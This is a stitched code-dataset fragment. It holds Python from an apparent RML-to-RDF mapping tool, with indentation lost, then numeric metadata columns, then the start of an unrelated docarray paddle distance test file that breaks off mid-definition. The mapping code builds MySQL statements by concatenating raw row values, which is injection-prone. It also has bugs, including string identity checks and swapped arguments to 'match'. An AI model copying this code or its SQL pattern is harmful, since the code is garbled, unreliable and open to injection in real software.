def match(value, regex):
return re.match(regex, value)[0]
def variantIdentifier(column1, column2,prefix):
value = ""
if (str(column1) != "nan"):
value = re.sub('_.*','',str(column2))+"_"+str(column1).replace("c.","").replace(">", "~")
value = prefix+value
return value
# returns conditionally a certain string
def condreplace(value, value1, value2, replvalue1, replvalue2):
if (value == 1):
value = replvalue1
elif (value == 0):
value = replvalue2
return value
def prefix_extraction(uri):
prefix = ""
url = ""
value = ""
if "#" in uri:
if "ru" in uri:
prefix = "ru"
elif "rdf-schema" in uri:
prefix = "rdfs"
elif "rdf-syntax-ns" in uri:
prefix = "rdf"
elif "rev" in uri:
prefix = "rev"
elif "owl" in uri:
prefix = "owl"
elif "fnml" in uri:
prefix = "fnml"
elif "function" in uri:
prefix = "fno"
elif "XML" in uri:
prefix = "xsd"
elif "journey" in uri:
prefix = "tmjourney"
elif "commons" in uri:
prefix = "tmcommons"
elif "organisations" in uri:
prefix = "tmorg"
url, value = uri.split("#")[0]+"#", uri.split("#")[1]
else:
if "resource" in uri:
prefix = "sio"
elif "af" in uri:
prefix = "af"
elif "example" in uri:
prefix = "ex"
elif "term" in uri:
prefix = "dcterms"
elif "elements" in uri:
prefix = "dce"
elif "iasis" in uri:
prefix = "iasis"
else:
prefix = uri.split("/")[len(uri.split("/"))-2]
if "." in prefix:
prefix = prefix.split(".")[0]
value = uri.split("/")[len(uri.split("/"))-1]
char = ""
temp = ""
temp_string = uri
while char != "/":
temp = temp_string
temp_string = temp_string[:-1]
char = temp[len(temp)-1]
url = temp
return prefix, url, value
def update_mapping(triple_maps, dic, output, original, join, data_source):
mapping = ""
for triples_map in triple_maps:
if triples_map.function:
pass
else:
if "#" in triples_map.triples_map_id:
mapping += "<#" + triples_map.triples_map_id.split("#")[1] + ">\n"
else:
mapping += "<#" + triples_map.triples_map_id + ">\n"
mapping += " a rr:TriplesMap;\n"
if data_source:
mapping += " rml:logicalSource [ rml:source \"" + data_source[triples_map.triples_map_id] +"\";\n"
else:
mapping += " rml:logicalSource [ rml:source \"" + triples_map.data_source +"\";\n"
if str(triples_map.file_format).lower() == "csv" and triples_map.query == "None":
mapping += " rml:referenceFormulation ql:CSV\n"
mapping += " ];\n"
mapping += " rr:subjectMap [\n"
if triples_map.subject_map.subject_mapping_type is "template":
mapping += " rr:template \"" + triples_map.subject_map.value + "\";\n"
elif triples_map.subject_map.subject_mapping_type is "reference":
mapping += " rml:reference " + triples_map.subject_map.value + ";\n"
elif triples_map.subject_map.subject_mapping_type is "constant":
mapping += " rr:constant " + triples_map.subject_map.value + ";\n"
elif triples_map.subject_map.subject_mapping_type is "function":
mapping = mapping[:-2]
mapping += "<" + triples_map.subject_map.value + ">;\n"
if triples_map.subject_map.rdf_class is not None:
prefix, url, value = prefix_extraction(triples_map.subject_map.rdf_class)
mapping += " rr:class " + prefix + ":" + value + "\n"
mapping += " ];\n"
for predicate_object in triples_map.predicate_object_maps_list:
mapping += " rr:predicateObjectMap [\n"
if "constant" in predicate_object.predicate_map.mapping_type :
prefix, url, value = prefix_extraction(predicate_object.predicate_map.value)
mapping += " rr:predicate " + prefix + ":" + value + ";\n"
elif "constant shortcut" in predicate_object.predicate_map.mapping_type:
prefix, url, value = prefix_extraction(predicate_object.predicate_map.value)
mapping += " rr:predicate " + prefix + ":" + value + ";\n"
elif "template" in predicate_object.predicate_map.mapping_type:
mapping += " rr:predicateMap[\n"
mapping += " rr:template \"" + predicate_object.predicate_map.value + "\"\n"
mapping += " ];\n"
elif "reference" in predicate_object.predicate_map.mapping_type:
mapping += " rr:predicateMap[\n"
mapping += " rml:reference \"" + predicate_object.predicate_map.value + "\"\n"
mapping += " ];\n"
mapping += " rr:objectMap "
if "constant" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:constant \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "template" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:template \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "reference" == predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rml:reference \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "parent triples map function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child <" + predicate_object.object_map.child + ">;\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map parent function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map child function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">\n"
if (predicate_object.object_map.child is not None) and (predicate_object.object_map.parent is not None):
mapping = mapping[:-1]
mapping += ";\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent \"" + predicate_object.object_map.parent + "\";\n"
mapping += " ]\n"
mapping += " ]\n"
elif "constant shortcut" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:constant \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "reference function" in predicate_object.object_map.mapping_type:
if join:
mapping += "[\n"
mapping += " rr:parentTriplesMap <#" + dic[predicate_object.object_map.value]["output_name"] + ">;\n"
for attr in dic[predicate_object.object_map.value]["inputs"]:
if attr[1] is not "constant":
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + attr[0] + "\";\n"
mapping += " rr:parent \"" + attr[0] +"\";\n"
mapping += " ];\n"
mapping += " ];\n"
else:
mapping += "[\n"
mapping += " rml:reference \"" + dic[predicate_object.object_map.value]["output_name"] + "\";\n"
mapping += " ];\n"
mapping += " ];\n"
if triples_map.function:
pass
else:
mapping = mapping[:-2]
mapping += ".\n\n"
if join:
for function in dic.keys():
mapping += "<#" + dic[function]["output_name"] + ">\n"
mapping += " a rr:TriplesMap;\n"
mapping += " rml:logicalSource [ rml:source \"" + dic[function]["output_file"] +"\";\n"
if "csv" in dic[function]["output_file"]:
mapping += " rml:referenceFormulation ql:CSV\n"
mapping += " ];\n"
mapping += " rr:subjectMap [\n"
if dic[function]["termType"]:
mapping += " rml:reference \"" + dic[function]["output_name"] + "\";\n"
mapping += " rr:termType rr:IRI\n"
else:
mapping += " rml:reference \"" + dic[function]["output_name"] + "\"\n"
mapping += " ].\n\n"
prefix_string = ""
f = open(original,"r")
original_mapping = f.readlines()
for prefix in original_mapping:
if ("prefix" in prefix) or ("base" in prefix):
prefix_string += prefix
else:
break
f.close()
prefix_string += "\n"
prefix_string += mapping
mapping_file = open(output + "/transfered_mapping.ttl","w")
mapping_file.write(prefix_string)
mapping_file.close()
def update_mapping_rdb(triple_maps, dic, output, original, join, data_source):
mapping = ""
for triples_map in triple_maps:
if triples_map.function:
pass
else:
if "#" in triples_map.triples_map_id:
mapping += "<#" + triples_map.triples_map_id.split("#")[1] + ">\n"
else:
mapping += "<#" + triples_map.triples_map_id + ">\n"
mapping += " a rr:TriplesMap;\n"
if data_source:
mapping += " rml:logicalSource [ rml:source <DB_source>;\n"
mapping += " rr:tableName \"" + data_source[triples_map.triples_map_id] + "\";\n"
else:
mapping += " rml:logicalSource [ rml:source <DB_source>;\n"
mapping += " rr:tableName \"" + triples_map.tablename + "\";\n"
if triples_map.query != "None":
mapping += " rml:query \"" + triples_map.query +"\"\n"
mapping += " ];\n"
mapping += " rr:subjectMap [\n"
if triples_map.subject_map.subject_mapping_type is "template":
mapping += " rr:template \"" + triples_map.subject_map.value + "\";\n"
elif triples_map.subject_map.subject_mapping_type is "reference":
mapping += " rml:reference " + triples_map.subject_map.value + ";\n"
elif triples_map.subject_map.subject_mapping_type is "constant":
mapping += " rr:constant " + triples_map.subject_map.value + ";\n"
elif triples_map.subject_map.subject_mapping_type is "function":
mapping = mapping[:-2]
mapping += "<" + triples_map.subject_map.value + ">;\n"
if triples_map.subject_map.rdf_class is not None:
prefix, url, value = prefix_extraction(triples_map.subject_map.rdf_class)
mapping += " rr:class " + prefix + ":" + value + "\n"
mapping += " ];\n"
for predicate_object in triples_map.predicate_object_maps_list:
mapping += " rr:predicateObjectMap [\n"
if "constant" in predicate_object.predicate_map.mapping_type :
prefix, url, value = prefix_extraction(predicate_object.predicate_map.value)
mapping += " rr:predicate " + prefix + ":" + value + ";\n"
elif "constant shortcut" in predicate_object.predicate_map.mapping_type:
prefix, url, value = prefix_extraction(predicate_object.predicate_map.value)
mapping += " rr:predicate " + prefix + ":" + value + ";\n"
elif "template" in predicate_object.predicate_map.mapping_type:
mapping += " rr:predicateMap[\n"
mapping += " rr:template \"" + predicate_object.predicate_map.value + "\"\n"
mapping += " ];\n"
elif "reference" in predicate_object.predicate_map.mapping_type:
mapping += " rr:predicateMap[\n"
mapping += " rml:reference \"" + predicate_object.predicate_map.value + "\"\n"
mapping += " ];\n"
mapping += " rr:objectMap "
if "constant" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:constant \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "template" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:template \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "reference" == predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rml:reference \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "parent triples map function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child <" + predicate_object.object_map.child + ">;\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map parent function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map child function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">\n"
if (predicate_object.object_map.child is not None) and (predicate_object.object_map.parent is not None):
mapping = mapping[:-1]
mapping += ";\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent \"" + predicate_object.object_map.parent + "\";\n"
mapping += " ]\n"
mapping += " ]\n"
elif "constant shortcut" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:constant \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "reference function" in predicate_object.object_map.mapping_type:
if join:
mapping += "[\n"
mapping += " rr:parentTriplesMap <#" + dic[predicate_object.object_map.value]["output_name"] + ">;\n"
for attr in dic[predicate_object.object_map.value]["inputs"]:
if attr[1] is not "constant":
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + attr[0] + "\";\n"
mapping += " rr:parent \"" + attr[0] +"\";\n"
mapping += " ];\n"
mapping += " ];\n"
else:
mapping += "[\n"
mapping += " rml:reference \"" + dic[predicate_object.object_map.value]["output_name"] + "\";\n"
mapping += " ];\n"
mapping += " ];\n"
if triples_map.function:
pass
else:
mapping = mapping[:-2]
mapping += ".\n\n"
if join:
for function in dic.keys():
mapping += "<#" + dic[function]["output_name"] + ">\n"
mapping += " a rr:TriplesMap;\n"
mapping += " rml:logicalSource [ rml:source \"" + dic[function]["output_file"] +"\";\n"
if "csv" in dic[function]["output_file"]:
mapping += " rml:referenceFormulation ql:CSV\n"
mapping += " ];\n"
mapping += " rr:subjectMap [\n"
if dic[function]["termType"]:
mapping += " rml:reference \"" + dic[function]["output_name"] + "\";\n"
mapping += " rr:termType rr:IRI\n"
else:
mapping += " rml:reference \"" + dic[function]["output_name"] + "\"\n"
mapping += " ].\n\n"
prefix_string = ""
db_source = "<#DB_source> a d2rq:Database;\n"
f = open(original,"r")
original_mapping = f.readlines()
for prefix in original_mapping:
if "prefix;" in prefix or "d2rq:Database;" in prefix:
pass
elif ("prefix" in prefix) or ("base" in prefix):
prefix_string += prefix
elif "jdbcDSN" in prefix:
db_source += prefix
elif "jdbcDriver" in prefix:
db_source += prefix
elif "d2rq:username" in prefix:
db_source += prefix
elif "d2rq:password" in prefix:
db_source += prefix
f.close()
prefix_string += "\n"
prefix_string += mapping
prefix_string += db_source
mapping_file = open(output + "/transfered_mapping.ttl","w")
mapping_file.write(prefix_string)
mapping_file.close()
def execute_function(row,dic):
if "tolower" in dic["function"]:
return tolower(row[dic["func_par"]["value"]])
elif "toupper" in dic["function"]:
return toupper(row[dic["func_par"]["value"]])
elif "totitle" in dic["function"]:
return totitle(row[dic["func_par"]["value"]])
elif "trim" in dic["function"]:
return trim(row[dic["func_par"]["value"]])
elif "chomp" in dic["function"]:
return chomp(row[dic["func_par"]["value"]],dic["func_par"]["toremove"])
elif "substring" in dic["function"]:
if "index2" in dic["func_par"].keys():
return substring(row[dic["func_par"]["value"]],dic["func_par"]["index1"],dic["func_par"]["index2"])
else:
return substring(row[dic["func_par"]["value"]],dic["func_par"]["index1"],None)
elif "replaceValue" in dic["function"]:
return replaceValue(row[dic["func_par"]["value"]],dic["func_par"]["value2"],dic["func_par"]["value3"])
elif "match" in dic["function"]:
return match(dic["func_par"]["regex"],row[dic["func_par"]["value"]])
elif "variantIdentifier" in dic["function"]:
return variantIdentifier(row[dic["func_par"]["column1"]],row[dic["func_par"]["column2"]],dic["func_par"]["prefix"])
elif "condreplace" in dic["function"]:
return condreplace(row[dic["func_par"]["value"]],dic["func_par"]["value1"],dic["func_par"]["value2"],dic["func_par"]["replvalue1"],dic["func_par"]["replvalue2"])
else:
print("Invalid function")
print("Aborting...")
sys.exit(1)
def execute_function_mysql(row,header,dic):
if "tolower" in dic["function"]:
return tolower(row[header.index(dic["func_par"]["value"])])
elif "toupper" in dic["function"]:
return toupper(row[header.index(dic["func_par"]["value"])])
elif "totitle" in dic["function"]:
return totitle(row[header.index(dic["func_par"]["value"])])
elif "trim" in dic["function"]:
return trim(row[header.index(dic["func_par"]["value"])])
elif "chomp" in dic["function"]:
return chomp(row[header.index(dic["func_par"]["value"])],dic["func_par"]["toremove"])
elif "substring" in dic["function"]:
if "index2" in dic["func_par"].keys():
return substring(row[header.index(dic["func_par"]["value"])],dic["func_par"]["index1"],dic["func_par"]["index2"])
else:
return substring(row[header.index(dic["func_par"]["value"])],dic["func_par"]["index1"],None)
elif "replaceValue" in dic["function"]:
return replaceValue(row[header.index(dic["func_par"]["value"])],dic["func_par"]["value2"],dic["func_par"]["value3"])
elif "match" in dic["function"]:
return match(dic["func_par"]["regex"],row[header.index(dic["func_par"]["value"])])
elif "variantIdentifier" in dic["function"]:
return variantIdentifier(row[header.index(dic["func_par"]["column1"])],row[header.index(dic["func_par"]["column2"])],dic["func_par"]["prefix"])
elif "condreplace" in dic["function"]:
return condreplace(row[header.index(dic["func_par"]["value"])],dic["func_par"]["value1"],dic["func_par"]["value2"],dic["func_par"]["replvalue1"],dic["func_par"]["replvalue2"])
else:
print("Invalid function")
print("Aborting...")
sys.exit(1)
def join_csv(source, dic, output):
with open(output + "/" + dic["output_name"] + ".csv", "w") as temp_csv:
writer = csv.writer(temp_csv, quoting=csv.QUOTE_ALL)
keys = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
keys.append(attr[0])
values = {}
global columns
if "variantIdentifier" in dic["function"]:
if dic["func_par"]["column1"]+dic["func_par"]["column2"] in columns:
keys.append(dic["output_name"])
writer.writerow(keys)
for row in columns[dic["func_par"]["column1"]+dic["func_par"]["column2"]]:
if (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] not in values) and (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]]] = value
else:
reader = pd.read_csv(source, usecols=keys)
reader = reader.where(pd.notnull(reader), None)
reader = reader.to_dict(orient='records')
keys.append(dic["output_name"])
writer.writerow(keys)
projection = []
for row in reader:
if (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] not in values) and (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]]] = value
projection.append({dic["func_par"]["column1"]:row[dic["func_par"]["column1"]], dic["func_par"]["column2"]:row[dic["func_par"]["column2"]]})
columns[dic["func_par"]["column1"]+dic["func_par"]["column2"]] = projection
else:
if dic["func_par"]["value"] in columns:
keys.append(dic["output_name"])
writer.writerow(keys)
for row in columns[dic["func_par"]["value"]]:
if (row[dic["func_par"]["value"]] not in values) and (row[dic["func_par"]["value"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["value"]]] = value
else:
reader = pd.read_csv(source, usecols=keys)
reader = reader.where(pd.notnull(reader), None)
reader = reader.to_dict(orient='records')
keys.append(dic["output_name"])
writer.writerow(keys)
projection = []
for row in reader:
if (row[dic["func_par"]["value"]] not in values) and (row[dic["func_par"]["value"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["value"]]] = value
projection.append({dic["func_par"]["value"]:row[dic["func_par"]["value"]]})
columns[dic["func_par"]["value"]] = projection
def join_csv_URI(source, dic, output):
with open(output + "/" + dic["output_name"] + ".csv", "w") as temp_csv:
writer = csv.writer(temp_csv, quoting=csv.QUOTE_ALL)
keys = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
keys.append(attr[0])
values = {}
global columns
if "variantIdentifier" in dic["function"]:
if dic["func_par"]["column1"]+dic["func_par"]["column2"] in columns:
keys.append(dic["output_name"])
writer.writerow(keys)
for row in columns[dic["func_par"]["column1"]+dic["func_par"]["column2"]]:
if (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] not in values) and (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]]] = value
else:
reader = pd.read_csv(source, usecols=keys)
reader = reader.where(pd.notnull(reader), None)
reader = reader.to_dict(orient='records')
keys.append(dic["output_name"])
writer.writerow(keys)
projection = []
for row in reader:
if (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] not in values) and (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]]] = value
projection.append({dic["func_par"]["column1"]:row[dic["func_par"]["column1"]], dic["func_par"]["column2"]:row[dic["func_par"]["column2"]]})
columns[dic["func_par"]["column1"]+dic["func_par"]["column2"]] = projection
else:
if dic["func_par"]["value"] in columns:
keys.append(dic["output_name"])
writer.writerow(keys)
for row in columns[dic["func_par"]["value"]]:
if (row[dic["func_par"]["value"]] not in values) and (row[dic["func_par"]["value"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["value"]]] = value
else:
reader = pd.read_csv(source, usecols=keys)
reader = reader.where(pd.notnull(reader), None)
reader = reader.to_dict(orient='records')
keys.append(dic["output_name"])
writer.writerow(keys)
projection = []
for row in reader:
if (row[dic["func_par"]["value"]] not in values) and (row[dic["func_par"]["value"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["value"]]] = value
projection.append({dic["func_par"]["value"]:row[dic["func_par"]["value"]]})
columns[dic["func_par"]["value"]] = projection
def create_dictionary(triple_map):
dic = {}
inputs = []
for tp in triple_map.predicate_object_maps_list:
if "#" in tp.predicate_map.value:
key = tp.predicate_map.value.split("#")[1]
tp_type = tp.predicate_map.mapping_type
elif "/" in tp.predicate_map.value:
key = tp.predicate_map.value.split("/")[len(tp.predicate_map.value.split("/"))-1]
tp_type = tp.predicate_map.mapping_type
if "constant" in tp.object_map.mapping_type:
value = tp.object_map.value
tp_type = tp.object_map.mapping_type
elif "#" in tp.object_map.value:
value = tp.object_map.value.split("#")[1]
tp_type = tp.object_map.mapping_type
elif "/" in tp.object_map.value:
value = tp.object_map.value.split("/")[len(tp.object_map.value.split("/"))-1]
tp_type = tp.object_map.mapping_type
else:
value = tp.object_map.value
tp_type = tp.object_map.mapping_type
dic.update({key : value})
if (key != "executes") and ([value,tp_type] not in inputs):
inputs.append([value,tp_type])
dic["inputs"] = inputs
return dic
def join_mysql(data, header, dic, db):
values = {}
cursor = db.cursor(buffered=True)
create = "CREATE TABLE " + dic["output_file"] + " ( "
if "variantIdentifier" in dic["function"]:
create += "`" + dic["func_par"]["column1"] + "` varchar(300),\n"
create += "`" + dic["func_par"]["column2"] + "` varchar(300),\n"
else:
create += "`" + dic["func_par"]["value"] + "` varchar(300),\n"
create += "`" + dic["output_name"] + "` varchar(300));"
cursor.execute(create)
if "variantIdentifier" in dic["function"]:
for row in data:
if (row[header.index(dic["func_par"]["column1"])]+row[header.index(dic["func_par"]["column2"])] not in values) and (row[header.index(dic["func_par"]["column1"])]+row[header.index(dic["func_par"]["column2"])] is not None):
value = execute_function_mysql(row,header,dic)
line = "INSERT INTO " + dic["output_file"] + "\n"
line += "VALUES ("
for attr in dic["inputs"]:
if attr[1] is not "constant":
line += "'" + row[header.index(attr[0])] + "', "
line += "'" + value + "');"
cursor.execute(line)
values[row[header.index(dic["func_par"]["column1"])]+row[header.index(dic["func_par"]["column2"])]] = value
else:
for row in data:
if (row[header.index(dic["func_par"]["value"])] not in values) and (row[header.index(dic["func_par"]["value"])] is not None):
value = execute_function_mysql(row,header,dic)
line = "INSERT INTO " + dic["output_file"] + "\n"
line += "VALUES ("
for attr in dic["inputs"]:
if attr[1] is not "constant":
line += "'" + row[header.index(attr[0])] + "', "
line += "'" + value + "');"
cursor.execute(line)
values[row[header.index(dic["func_par"]["value"])]] = value
def translate_sql(triples_map):
query_list = []
proyections = []
if "{" in triples_map.subject_map.value:
subject = triples_map.subject_map.value
count = count_characters(subject)
if (count == 1) and (subject.split("{")[1].split("}")[0] not in proyections):
subject = subject.split("{")[1].split("}")[0]
if "[" in subject:
subject = subject.split("[")[0]
proyections.append(subject)
elif count > 1:
subject_list = subject.split("{")
for s in subject_list:
if "}" in s:
subject = s.split("}")[0]
if "[" in subject:
subject = subject.split("[")
if subject not in proyections:
proyections.append(subject)
for po in triples_map.predicate_object_maps_list:
if "{" in po.object_map.value:
count = count_characters(po.object_map.value)
if 0 < count <= 1 :
predicate = po.object_map.value.split("{")[1].split("}")[0]
if "[" in predicate:
predicate = predicate.split("[")[0]
if predicate not in proyections:
proyections.append(predicate)
elif 1 < count:
predicate = po.object_map.value.split("{")
for po_e in predicate:
if "}" in po_e:
pre = po_e.split("}")[0]
if "[" in pre:
pre = pre.split("[")
if pre not in proyections:
proyections.append(pre)
elif "#" in po.object_map.value:
pass
elif "/" in po.object_map.value:
pass
else:
predicate = po.object_map.value
if "[" in predicate:
predicate = predicate.split("[")[0]
if predicate not in proyections:
proyections.append(predicate)
if po.object_map.child != None:
if po.object_map.child not in proyections:
proyections.append(po.object_map.child)
temp_query = "SELECT DISTINCT "
for p in proyections:
if p is not "None":
if p == proyections[len(proyections)-1]:
temp_query += "`" + p + "`"
else:
temp_query += "`" + p + "`, "
else:
temp_query = temp_query[:-2]
if triples_map.tablename != "None":
temp_query = temp_query + " FROM " + triples_map.tablename + ";"
else:
temp_query = temp_query + " FROM " + triples_map.data_source + ";"
query_list.append(temp_query)
return triples_map.iterator, query_list
def count_characters(string):
count = 0
for s in string:
if s == "{":
count += 1
return count
| 47.98818
| 233
| 0.496084
| 4,185
| 40,598
| 4.664516
| 0.057826
| 0.045899
| 0.06557
| 0.073767
| 0.85426
| 0.827622
| 0.816044
| 0.80334
| 0.792941
| 0.788484
| 0
| 0.007409
| 0.361717
| 40,598
| 846
| 234
| 47.98818
| 0.745919
| 0.008991
| 0
| 0.710419
| 0
| 0
| 0.21333
| 0.027148
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028417
| false
| 0.010825
| 0.006766
| 0.009472
| 0.08525
| 0.005413
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ab55fc824a6febdc37bb85b03443b686732faa6b
| 2,937
|
py
|
Python
|
tests/unit/math/distance/test_paddle.py
|
startakovsky/docarray
|
78dd3199d25b3e533cd09643b97359783c193397
|
[
"Apache-2.0"
] | 591
|
2022-01-09T14:39:59.000Z
|
2022-03-31T13:19:39.000Z
|
tests/unit/math/distance/test_paddle.py
|
startakovsky/docarray
|
78dd3199d25b3e533cd09643b97359783c193397
|
[
"Apache-2.0"
] | 210
|
2022-01-10T07:59:29.000Z
|
2022-03-31T14:49:18.000Z
|
tests/unit/math/distance/test_paddle.py
|
startakovsky/docarray
|
78dd3199d25b3e533cd09643b97359783c193397
|
[
"Apache-2.0"
] | 40
|
2022-01-09T14:52:20.000Z
|
2022-03-31T07:59:45.000Z
|
import numpy as np
import paddle
import pytest
from docarray.math.distance.paddle import cosine, euclidean, sqeuclidean
@pytest.mark.parametrize(
'x_mat, y_mat, result',
(
(
paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
np.array([[1.192093e-07, 2.53681537e-02], [2.53681537e-02, 0]]),
),
(
paddle.to_tensor([[1, 2, 3]], dtype='float32'),
paddle.to_tensor([[1, 2, 3]], dtype='float32'),
np.array([[1.192093e-07]]),
),
(
paddle.to_tensor([[0, 0, 0]], dtype='float32'),
paddle.to_tensor([[0, 0, 0]], dtype='float32'),
np.array([[1]]),
),
(
paddle.to_tensor([[1, 2, 3]], dtype='float32'),
paddle.to_tensor([[19, 53, 201]], dtype='float32'),
np.array([[0.06788693]]),
),
),
)
def test_cosine(x_mat, y_mat, result):
np.testing.assert_almost_equal(cosine(x_mat, y_mat), result, decimal=3)
@pytest.mark.parametrize(
'x_mat, y_mat, result',
(
(
paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
np.array([[0, 27], [27, 0]]),
),
(
paddle.to_tensor([[1, 2, 3]], dtype='float32'),
paddle.to_tensor([[1, 2, 3]], dtype='float32'),
np.array([[0]]),
),
(
paddle.to_tensor([[0, 0, 0]], dtype='float32'),
paddle.to_tensor([[0, 0, 0]], dtype='float32'),
np.array([[0]]),
),
(
paddle.to_tensor([[1, 2, 3]], dtype='float32'),
paddle.to_tensor([[19, 53, 201]], dtype='float32'),
np.array([[42129]]),
),
),
)
def test_sqeuclidean(x_mat, y_mat, result):
np.testing.assert_almost_equal(sqeuclidean(x_mat, y_mat), result, decimal=3)
@pytest.mark.parametrize(
'x_mat, y_mat, result',
(
(
paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
np.array([[0, 5.19615242], [5.19615242, 0]]),
),
(
paddle.to_tensor([[1, 2, 3]], dtype='float32'),
paddle.to_tensor([[1, 2, 3]], dtype='float32'),
np.array([[0]]),
),
(
paddle.to_tensor([[0, 0, 0]], dtype='float32'),
paddle.to_tensor([[0, 0, 0]], dtype='float32'),
np.array([[0]]),
),
(
paddle.to_tensor([[1, 2, 3]], dtype='float32'),
paddle.to_tensor([[19, 53, 201]], dtype='float32'),
np.array([[205.2535018]]),
),
),
)
def test_euclidean(x_mat, y_mat, result):
